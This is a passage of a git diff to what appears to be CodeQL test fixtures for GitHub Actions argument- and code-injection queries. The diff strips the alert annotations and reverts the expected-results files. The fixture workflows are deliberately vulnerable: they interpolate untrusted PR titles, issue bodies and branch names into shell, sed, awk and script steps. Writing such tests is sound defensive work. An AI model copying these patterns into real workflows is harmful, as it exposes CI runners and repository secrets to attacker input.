| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref index 3475e69cd3ad..a2f6e1c12b9c 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-088/ArgumentInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-088/ArgumentInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 981e5b865494..12171d8c7f27 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
@@ -1,4 +1,3 @@ -#select edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -21,3 +20,4 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref index 3aa94b52965a..b96467552c5b 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-088/ArgumentInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml index bed01ffea540..ba7d3eec1af7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml 
@@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml index f4a9d4574528..510ad86cbfa9 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -6,4 +6,4 @@ runs: - shell: bash env: FOO: ${{ secrets.FOO}} - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml index 6c63aa58afa5..ba7d3eec1af7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 75a02958a998..53a2e0c87e27 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml 
@@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] + run: echo '${{ github.event.issue.body }}' - name: Step id: step env: @@ -25,10 +25,10 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.issue.body }} # $ Source[actions/code-injection/critical] + FOO2: ${{ github.event.issue.body }} shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] + run: echo "${{ inputs.taint }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml index 25b58d07466c..0048a4ca31e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -213,7 +213,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] + git pull origin ${{ github.head_ref || github.ref }} git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml index 0a37ade5da63..8bffcdc4020e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml 
@@ -74,7 +74,7 @@ runs: # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli run: | packages="ultralytics-actions" - if [ "${{ inputs.spelling }}" = "true" ]; then # $ Alert[actions/code-injection/medium] + if [ "${{ inputs.spelling }}" = "true" ]; then packages="$packages codespell tomli" fi @@ -211,10 +211,10 @@ runs: - name: Commit and Push Changes if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' run: | - git config --global user.name "${{ inputs.github_username }}" # $ Alert[actions/code-injection/medium] - git config --global user.email "${{ inputs.github_email }}" # $ Alert[actions/code-injection/medium] + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" # this action is not called in the test - git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/medium] + git pull origin ${{ github.head_ref || github.ref }} git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index cd9dcaf1a0b0..398c0ee6a6e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -19,7 +19,7 @@ runs: using: composite steps: - shell: bash - run: echo "${{ inputs.title }}" # $ Alert[actions/code-injection/critical] + run: echo "${{ inputs.title }}" - uses: frabert/replace-string-action@v2.5 id: out with: 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml index 85decb599321..a8019fbbf145 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -93,7 +93,7 @@ runs: shell: bash - shell: bash run: | - echo "${{ inputs.body }}" # $ Alert[actions/code-injection/critical] + echo "${{ inputs.body }}" # Checkout Repository ---------------------------------------------------------------------------------------------- - name: Checkout Repository @@ -220,7 +220,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] + git pull origin ${{ github.head_ref || github.ref }} git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml index 301be58e2e80..7b9c57354882 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -14,7 +14,7 @@ jobs: - uses: actions/checkout@v2 - name: Remove conflicting chars env: - ISSUE_TITLE: ${{github.event.issue.title}} # $ Source[actions/code-injection/critical] + ISSUE_TITLE: ${{github.event.issue.title}} uses: frabert/replace-string-action@1.2 id: remove_quotations with: 
@@ -24,6 +24,6 @@ jobs: - name: Check info id: check-info run: | - echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index c4add3b215ec..5cf7bbd4e6bd 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -17,12 +17,12 @@ jobs: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr - - name: save PR id # $ Source[actions/code-injection/critical] + - name: save PR id id: pr run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - - run: echo ${{ steps.prepare.outputs.pr }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ steps.prepare.outputs.pr }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml index 2d1acd97b2dc..63acdc612b0e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml @@ -14,9 +14,9 @@ jobs: name: artifact # Save PR id to output - - name: Save artifact data # $ Source[actions/code-injection/critical] + - name: Save artifact data id: artifact run: echo "::set-output name=id::$(> $GITHUB_ENV # $ Alert[actions/code-injection/medium] + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV #If a target branch was found will run the action - if: env.destination_branch != 'invalid' 
@@ -50,7 +50,7 @@ jobs: git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} git cherry-pick -x ${{github.event.after}} --strategy-option theirs git push -u origin ${{env.auto_branch}} - hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" # $ Alert[actions/code-injection/medium] + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" env: #Token used for the pull request. Corresponds to the DynamoBot account GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml index d07398ebca72..fdb140ec3802 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -4,5 +4,5 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml index 5cdf5c0bf62d..649d3a6e1319 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml 
@@ -4,6 +4,6 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' + - run: echo '${{ github.event.comment.body }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml index 0da70f8e2d4a..b4c2ecaec700 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -81,7 +81,7 @@ jobs: git push \ "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ - 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' env: BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} @@ -91,4 +91,4 @@ jobs: with: github-token: ${{ secrets.githubBotPAT }} script: | - const fileList = `${{ steps.git-commit.outputs.file-list }}` # $ Alert[actions/code-injection/critical] + const fileList = `${{ steps.git-commit.outputs.file-list }}` 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml index 333af0376ca0..0c4aa93c7a58 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] + const log = '${{ env.log }}'; let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { 
@@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] + const prevLog = '${{ env.prev_log }}'; const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml index 38a6bcbd6af5..a952c8c1ab85 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pages[1].title }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.pages[11].title }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.pages[0].page_name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.pages[2222].page_name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[1].title }}' + - run: echo '${{ github.event.pages[11].title }}' + - run: echo '${{ github.event.pages[0].page_name }}' + - run: echo '${{ github.event.pages[2222].page_name }}' - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml index 4180c7d6769b..c8a30dad2944 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml 
@@ -15,7 +15,7 @@ jobs: - name: Extract and Clean Initial URL id: extract-url env: - BODY: ${{ github.event.comment.body }} # $ Source[actions/code-injection/critical] + BODY: ${{ github.event.comment.body }} run: | echo "::set-output name=initial_url::$BODY" @@ -34,4 +34,4 @@ jobs: - name: Update Comment with New URL run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" # $ Alert[actions/code-injection/critical] + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 57df1a28983f..1ad46b0f6eb1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml index d32f1f2c1a87..4f149a920419 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml 
@@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml index 4d838b0d465a..21fa789d9e7d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -42,4 +42,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git 